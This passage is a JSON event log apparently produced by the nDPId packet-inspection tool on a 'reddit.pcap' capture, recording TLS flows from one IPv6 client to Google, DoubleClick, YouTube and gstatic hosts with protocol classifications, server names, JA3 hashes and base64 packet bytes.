{"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688712,"flow_last_seen":1605291688712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688712,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605291688712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688712,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQQAAAAAoAL9IGnKAAACBAWgBAIICoWLJ5EAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688749,"flow_last_seen":1605291688749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688749,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605291688749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688749,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7IAAAAAoAL9ICgwAAACBAWgBAIICm3\/yPIAAAAAAQMDBw=="} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4156,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688754,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAYqAcsBIEmLB5kd7IUo3\/YpAbvVxjGyAqhUIR0FoBJXgNU8AAACBAV4AQMDAwQCCArC10MXhYsnkQ=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688754,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQUxsgKpgBAB+1kkAAABAQgKhYsnu8LXQxc="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbvfwoEYYXPjQDuzoBJXgOVIAAACBAV4AQMDAwQCCArC10M\/bf\/I8g=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688786,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7OBGGF0gBAB+2k0AAABAQgKbf\/JGMLXQz8="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688830,"flow_last_seen":1605291688830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688830,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605291688830,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688830,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5AAAAAAoAL9IFwjAAACBAWgBAIICu7gTZEAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688831,"flow_last_seen":1605291688831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688831,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605291688831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688831,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+wAAAAAoAL9IM9TAAACBAWgBAIICkSadMcAAAAAAQMDBw=="} 
-00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/oAAAAAoAL9IC3PAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdYAAAAAoAL9IPghAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} -00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4xvp17E2f1af7oBJXgOZHAAACBAV4AQMDAwQCCArC10OnN\/P3eA=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4yD8lZERbpSHXoBJXgPP1AAACBAV4AQMDAwQCCArC10OmN\/P3eA=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4820,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/v6dexOgBAB+2orAAABAQgKN\/P3psLXQ6c="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4821,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdc\/JWRFgBAB+3fZAAABAQgKN\/P3psLXQ6Y="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4856,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605291688893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688893,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvjCkXQfikiqr+RoBJXgDd0AAACBAV4AQMDAwQCCArC10OZ7uBNkQ=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1605291688893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688893,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5FF0H4qgBAB+7tFAAABAQgK7uBN0cLXQ5k="} 
-00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4865,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688894,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgVAAAAAAAAIBYqAcsBIEmLB5kd7IUo3\/YpAbvMSCvRvaZMy7vtoBJXgIUlAAACBAV4AQMDAwQCCArC10OaRJp0xw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4867,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688894,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+0r0b2ngBAB+wj4AAABAQgKRJp1BsLXQ5o="} 
-00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 